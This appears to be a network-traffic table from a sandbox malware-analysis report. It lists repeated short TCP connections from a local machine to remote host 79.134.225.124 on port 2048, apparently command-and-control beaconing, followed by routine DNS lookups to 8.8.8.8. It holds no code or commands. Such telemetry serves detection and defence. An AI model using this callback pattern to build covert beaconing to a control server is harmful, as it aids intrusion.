Apr 15, 2021 21:38:32.085086107 CEST	2048	49754	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:32.643627882 CEST	49754	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:32.731340885 CEST	2048	49754	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:32.794198036 CEST	49755	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:32.880393982 CEST	2048	49755	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:33.393678904 CEST	49755	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:33.481137991 CEST	2048	49755	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:33.987509966 CEST	49755	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:34.074908972 CEST	2048	49755	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:35.145756006 CEST	49761	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:35.232477903 CEST	2048	49761	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:35.742475033 CEST	49761	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:35.829288006 CEST	2048	49761	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:36.331723928 CEST	49761	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:36.419114113 CEST	2048	49761	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:36.511332035 CEST	49762	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:36.598814011 CEST	2048	49762	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:37.112768888 CEST	49762	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:37.201077938 CEST	2048	49762	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:37.709642887 CEST	49762	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:37.797185898 CEST	2048	49762	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:38.943613052 CEST	49763	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:39.027455091 CEST	2048	49763	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:39.534902096 CEST	49763	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:39.619714022 CEST	2048	49763	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:40.128679037 CEST	49763	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:40.212016106 CEST	2048	49763	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:40.339210033 CEST	49764	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:40.424480915 CEST	2048	49764	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:40.925556898 CEST	49764	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:41.009624958 CEST	2048	49764	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:41.519346952 CEST	49764	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:41.603621006 CEST	2048	49764	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:42.668256044 CEST	49765	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:42.752489090 CEST	2048	49765	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:43.253989935 CEST	49765	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:43.340341091 CEST	2048	49765	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:43.847692013 CEST	49765	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:43.931688070 CEST	2048	49765	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:43.994246006 CEST	49766	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:44.080972910 CEST	2048	49766	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:44.582142115 CEST	49766	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:44.669075966 CEST	2048	49766	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:45.176012993 CEST	49766	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:45.264945984 CEST	2048	49766	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:46.329462051 CEST	49767	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:46.413727999 CEST	2048	49767	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:46.926073074 CEST	49767	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:47.009196043 CEST	2048	49767	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:47.519881964 CEST	49767	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:47.604331970 CEST	2048	49767	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:47.661783934 CEST	49768	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:47.748692989 CEST	2048	49768	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:48.254463911 CEST	49768	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:48.342601061 CEST	2048	49768	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:48.848176003 CEST	49768	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:48.936419964 CEST	2048	49768	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:50.007340908 CEST	49769	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:50.096247911 CEST	2048	49769	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:50.598378897 CEST	49769	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:50.685206890 CEST	2048	49769	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:51.192085028 CEST	49769	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:51.278239012 CEST	2048	49769	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:51.369781017 CEST	49770	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:51.454307079 CEST	2048	49770	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:51.957882881 CEST	49770	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:52.042535067 CEST	2048	49770	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:52.551626921 CEST	49770	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:52.635351896 CEST	2048	49770	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:53.714286089 CEST	49771	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:53.803879023 CEST	2048	49771	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:54.317399979 CEST	49771	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:54.406495094 CEST	2048	49771	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:54.911304951 CEST	49771	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:54.998040915 CEST	2048	49771	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:55.061065912 CEST	49772	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:55.146011114 CEST	2048	49772	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:55.661417007 CEST	49772	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:55.746844053 CEST	2048	49772	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:56.255021095 CEST	49772	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:56.338697910 CEST	2048	49772	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:57.442166090 CEST	49773	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:57.529723883 CEST	2048	49773	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:58.036384106 CEST	49773	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:58.123121023 CEST	2048	49773	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:58.630194902 CEST	49773	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:58.717730045 CEST	2048	49773	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:59.773544073 CEST	49774	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:59.860261917 CEST	2048	49774	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:00.364835978 CEST	49774	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:00.450871944 CEST	2048	49774	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:00.958668947 CEST	49774	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:01.045922041 CEST	2048	49774	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:02.116889954 CEST	49775	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:02.202363014 CEST	2048	49775	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:02.708673000 CEST	49775	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:02.792582989 CEST	2048	49775	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:03.302436113 CEST	49775	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:03.386651993 CEST	2048	49775	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:03.470475912 CEST	49776	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:03.555042982 CEST	2048	49776	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:04.068113089 CEST	49776	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:04.152514935 CEST	2048	49776	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:04.661935091 CEST	49776	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:04.745755911 CEST	2048	49776	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:05.819237947 CEST	49778	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:05.903645039 CEST	2048	49778	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:06.412077904 CEST	49778	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:06.496135950 CEST	2048	49778	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:07.005867004 CEST	49778	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:07.090866089 CEST	2048	49778	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:07.171509027 CEST	49779	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:07.255579948 CEST	2048	49779	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:07.771584034 CEST	49779	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:07.854707003 CEST	2048	49779	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:08.365353107 CEST	49779	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:08.449105024 CEST	2048	49779	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:09.513375998 CEST	49781	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:09.598279953 CEST	2048	49781	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:10.100419998 CEST	49781	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:10.186980963 CEST	2048	49781	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:10.693726063 CEST	49781	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:10.778973103 CEST	2048	49781	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:10.845328093 CEST	49782	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:10.932240009 CEST	2048	49782	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:11.443711996 CEST	49782	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:11.530433893 CEST	2048	49782	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:12.038413048 CEST	49782	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:12.125094891 CEST	2048	49782	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:13.190272093 CEST	49783	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:13.274347067 CEST	2048	49783	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:13.787703037 CEST	49783	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:13.870897055 CEST	2048	49783	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:14.381546974 CEST	49783	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:14.465650082 CEST	2048	49783	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:14.528220892 CEST	49784	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:14.613513947 CEST	2048	49784	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:15.131555080 CEST	49784	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:15.215509892 CEST	2048	49784	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:15.725457907 CEST	49784	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:15.811064959 CEST	2048	49784	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:16.981302977 CEST	49785	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:17.065267086 CEST	2048	49785	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:17.569452047 CEST	49785	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:17.653492928 CEST	2048	49785	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:18.163117886 CEST	49785	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:18.246772051 CEST	2048	49785	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:18.313303947 CEST	49786	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:18.396604061 CEST	2048	49786	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:18.897559881 CEST	49786	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:18.981658936 CEST	2048	49786	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:19.491277933 CEST	49786	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:19.575508118 CEST	2048	49786	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:20.654282093 CEST	49787	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:20.738020897 CEST	2048	49787	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:21.241453886 CEST	49787	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:21.326416016 CEST	2048	49787	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:21.835222006 CEST	49787	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:21.918469906 CEST	2048	49787	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:22.012489080 CEST	49788	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:22.099256039 CEST	2048	49788	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:22.601131916 CEST	49788	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:22.684602022 CEST	2048	49788	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:23.195286036 CEST	49788	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:23.279125929 CEST	2048	49788	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:24.359642982 CEST	49789	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:24.445847988 CEST	2048	49789	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:24.960503101 CEST	49789	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:25.044250011 CEST	2048	49789	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:25.569940090 CEST	49789	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:25.653171062 CEST	2048	49789	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:25.717273951 CEST	49792	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:25.801286936 CEST	2048	49792	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:26.460669041 CEST	49792	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:26.544907093 CEST	2048	49792	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:27.070087910 CEST	49792	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:27.154232979 CEST	2048	49792	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:28.231076956 CEST	49797	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:28.315403938 CEST	2048	49797	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:28.820225000 CEST	49797	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:28.907901049 CEST	2048	49797	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:29.414046049 CEST	49797	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:29.499300003 CEST	2048	49797	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:29.566898108 CEST	49799	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:29.650533915 CEST	2048	49799	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:30.164153099 CEST	49799	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:30.249209881 CEST	2048	49799	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:30.757843018 CEST	49799	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:30.841003895 CEST	2048	49799	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:31.924061060 CEST	49802	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:32.010052919 CEST	2048	49802	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:32.523648024 CEST	49802	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:32.611740112 CEST	2048	49802	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:33.117448092 CEST	49802	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:33.204282045 CEST	2048	49802	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:33.272092104 CEST	49805	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:33.356323004 CEST	2048	49805	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:33.867516994 CEST	49805	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:33.952429056 CEST	2048	49805	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:34.461265087 CEST	49805	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:34.545568943 CEST	2048	49805	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:35.615458965 CEST	49806	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:35.699443102 CEST	2048	49806	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:36.212014914 CEST	49806	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:36.296029091 CEST	2048	49806	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:36.805324078 CEST	49806	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:36.889379978 CEST	2048	49806	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:36.952668905 CEST	49807	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:37.037909985 CEST	2048	49807	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:37.539738894 CEST	49807	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:37.623713017 CEST	2048	49807	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:38.133441925 CEST	49807	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:38.219696999 CEST	2048	49807	79.134.225.124	192.168.2.7
Apr 15, 2021 21:39:39.292680979 CEST	49808	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:39:39.376123905 CEST	2048	49808	79.134.225.124	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 15, 2021 21:37:21.116890907 CEST	56590	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:37:21.139518023 CEST	60501	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:37:21.177566051 CEST	53	56590	8.8.8.8	192.168.2.7
Apr 15, 2021 21:37:21.212950945 CEST	53	60501	8.8.8.8	192.168.2.7
Apr 15, 2021 21:37:21.342756987 CEST	53775	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:37:21.393239021 CEST	53	53775	8.8.8.8	192.168.2.7
Apr 15, 2021 21:37:22.445159912 CEST	51837	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:37:22.496710062 CEST	53	51837	8.8.8.8	192.168.2.7
Apr 15, 2021 21:37:23.436460018 CEST	55411	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:37:23.485205889 CEST	53	55411	8.8.8.8	192.168.2.7
Apr 15, 2021 21:37:24.375103951 CEST	63668	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:37:24.423715115 CEST	53	63668	8.8.8.8	192.168.2.7
Apr 15, 2021 21:37:25.134414911 CEST	54640	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:37:25.184573889 CEST	53	54640	8.8.8.8	192.168.2.7
Apr 15, 2021 21:37:26.352135897 CEST	58739	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:37:26.402460098 CEST	53	58739	8.8.8.8	192.168.2.7
Apr 15, 2021 21:37:27.737003088 CEST	60338	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:37:27.799365997 CEST	53	60338	8.8.8.8	192.168.2.7
Apr 15, 2021 21:37:28.697981119 CEST	58717	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:37:28.751064062 CEST	53	58717	8.8.8.8	192.168.2.7
Apr 15, 2021 21:37:28.955796003 CEST	59762	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:37:29.004618883 CEST	53	59762	8.8.8.8	192.168.2.7
Apr 15, 2021 21:37:30.043492079 CEST	54329	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:37:30.092012882 CEST	53	54329	8.8.8.8	192.168.2.7
Apr 15, 2021 21:37:32.206346989 CEST	58052	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:37:32.268373013 CEST	53	58052	8.8.8.8	192.168.2.7
Apr 15, 2021 21:37:33.275363922 CEST	54008	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:37:33.324043989 CEST	53	54008	8.8.8.8	192.168.2.7
Apr 15, 2021 21:37:34.326977968 CEST	59451	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:37:34.375830889 CEST	53	59451	8.8.8.8	192.168.2.7
Apr 15, 2021 21:37:35.509403944 CEST	52914	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:37:35.562067032 CEST	53	52914	8.8.8.8	192.168.2.7
Apr 15, 2021 21:37:37.801271915 CEST	64569	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:37:37.852930069 CEST	53	64569	8.8.8.8	192.168.2.7
Apr 15, 2021 21:37:38.638372898 CEST	52816	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:37:38.688057899 CEST	53	52816	8.8.8.8	192.168.2.7
Apr 15, 2021 21:37:39.744858027 CEST	50781	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:37:39.793553114 CEST	53	50781	8.8.8.8	192.168.2.7
Apr 15, 2021 21:37:41.156838894 CEST	54230	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:37:41.205507040 CEST	53	54230	8.8.8.8	192.168.2.7
Apr 15, 2021 21:37:42.519402981 CEST	54911	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:37:42.578747988 CEST	53	54911	8.8.8.8	192.168.2.7
Apr 15, 2021 21:37:45.196619987 CEST	49958	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:37:45.253675938 CEST	53	49958	8.8.8.8	192.168.2.7
Apr 15, 2021 21:37:48.802593946 CEST	50860	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:37:48.893234015 CEST	53	50860	8.8.8.8	192.168.2.7
Apr 15, 2021 21:37:49.218544960 CEST	50452	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:37:49.267182112 CEST	53	50452	8.8.8.8	192.168.2.7
Apr 15, 2021 21:37:49.960247040 CEST	59730	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:37:50.058324099 CEST	53	59730	8.8.8.8	192.168.2.7
Apr 15, 2021 21:37:50.591296911 CEST	59310	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:37:50.657018900 CEST	53	59310	8.8.8.8	192.168.2.7
Apr 15, 2021 21:37:50.752192974 CEST	51919	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:37:50.803999901 CEST	53	51919	8.8.8.8	192.168.2.7
Apr 15, 2021 21:37:51.613775015 CEST	64296	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:37:51.662403107 CEST	53	64296	8.8.8.8	192.168.2.7
Apr 15, 2021 21:37:52.027503014 CEST	56680	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:37:52.090646982 CEST	53	56680	8.8.8.8	192.168.2.7
Apr 15, 2021 21:37:54.396652937 CEST	58820	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:37:54.445342064 CEST	53	58820	8.8.8.8	192.168.2.7
Apr 15, 2021 21:37:55.883899927 CEST	60983	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:37:55.945579052 CEST	53	60983	8.8.8.8	192.168.2.7
Apr 15, 2021 21:37:58.407825947 CEST	49247	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:37:58.464782953 CEST	53	49247	8.8.8.8	192.168.2.7
Apr 15, 2021 21:37:59.886395931 CEST	52286	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:37:59.943789959 CEST	53	52286	8.8.8.8	192.168.2.7
Apr 15, 2021 21:38:02.496493101 CEST	56064	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:38:02.556653976 CEST	53	56064	8.8.8.8	192.168.2.7
Apr 15, 2021 21:38:05.063811064 CEST	63744	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:38:05.121182919 CEST	53	63744	8.8.8.8	192.168.2.7
Apr 15, 2021 21:38:07.598874092 CEST	61457	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:38:07.660828114 CEST	53	61457	8.8.8.8	192.168.2.7
Apr 15, 2021 21:38:09.121296883 CEST	58367	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:38:09.182832956 CEST	53	58367	8.8.8.8	192.168.2.7
Apr 15, 2021 21:38:11.537194014 CEST	60599	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:38:11.599572897 CEST	53	60599	8.8.8.8	192.168.2.7
Apr 15, 2021 21:38:12.891961098 CEST	59571	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:38:12.952260017 CEST	53	59571	8.8.8.8	192.168.2.7
Apr 15, 2021 21:38:15.411658049 CEST	52689	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:38:15.475481033 CEST	53	52689	8.8.8.8	192.168.2.7
Apr 15, 2021 21:38:16.332539082 CEST	50290	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:38:16.392249107 CEST	53	50290	8.8.8.8	192.168.2.7
Apr 15, 2021 21:38:16.885463953 CEST	60427	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:38:16.945600033 CEST	53	60427	8.8.8.8	192.168.2.7
Apr 15, 2021 21:38:17.518254995 CEST	56209	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:38:17.575056076 CEST	53	56209	8.8.8.8	192.168.2.7
Apr 15, 2021 21:38:17.929274082 CEST	59582	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:38:17.994009972 CEST	53	59582	8.8.8.8	192.168.2.7
Apr 15, 2021 21:38:18.128596067 CEST	60949	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:38:18.180253983 CEST	53	60949	8.8.8.8	192.168.2.7
Apr 15, 2021 21:38:18.573218107 CEST	58542	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:38:18.703882933 CEST	53	58542	8.8.8.8	192.168.2.7
Apr 15, 2021 21:38:19.239909887 CEST	59179	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:38:19.297369003 CEST	53	59179	8.8.8.8	192.168.2.7
Apr 15, 2021 21:38:20.951914072 CEST	60927	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:38:21.009164095 CEST	53	60927	8.8.8.8	192.168.2.7
Apr 15, 2021 21:38:23.464535952 CEST	57854	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:38:23.526545048 CEST	53	57854	8.8.8.8	192.168.2.7
Apr 15, 2021 21:38:24.889895916 CEST	62026	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:38:24.946687937 CEST	53	62026	8.8.8.8	192.168.2.7
Apr 15, 2021 21:38:27.407407999 CEST	59453	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:38:27.467569113 CEST	53	59453	8.8.8.8	192.168.2.7
Apr 15, 2021 21:38:27.503534079 CEST	62468	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:38:27.560568094 CEST	53	62468	8.8.8.8	192.168.2.7
Apr 15, 2021 21:38:28.856319904 CEST	52563	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:38:28.916944027 CEST	53	52563	8.8.8.8	192.168.2.7
Apr 15, 2021 21:38:31.242928028 CEST	54721	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:38:31.302731037 CEST	53	54721	8.8.8.8	192.168.2.7
Apr 15, 2021 21:38:32.736114979 CEST	62826	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:38:32.755860090 CEST	62046	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:38:32.793426991 CEST	53	62826	8.8.8.8	192.168.2.7
Apr 15, 2021 21:38:32.818896055 CEST	53	62046	8.8.8.8	192.168.2.7
